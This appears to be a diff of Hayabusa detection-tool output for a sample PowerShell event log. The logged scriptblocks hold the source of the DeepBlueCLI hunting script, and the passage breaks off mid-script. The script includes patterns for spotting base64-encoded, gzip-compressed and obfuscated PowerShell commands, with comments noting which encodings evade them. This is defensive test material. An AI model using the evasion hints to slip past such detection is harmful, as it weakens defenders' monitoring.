+2017-08-31 01:41:37.559 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:41:37.559 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:41:37.559 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:41:37.562 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ #$eventxml.Event.EventData.Data[1].""#text"" $pscommand=$eventXML.Event.EventData.Data[4].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:41:37.567 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:41:37.570 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:41:50.476 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:41:50.476 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:41:50.477 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:41:50.477 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:41:51.309 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:42:14.153 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"Get-WinEvent @{logname=""Microsoft-Windows-PowerShell/Operational"";ID=4104}|fl|more",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:42:19.463 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:42:22.680 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:42:36.639 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:43:05.016 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:43:05.021 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue <at> backshore <dot> net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content 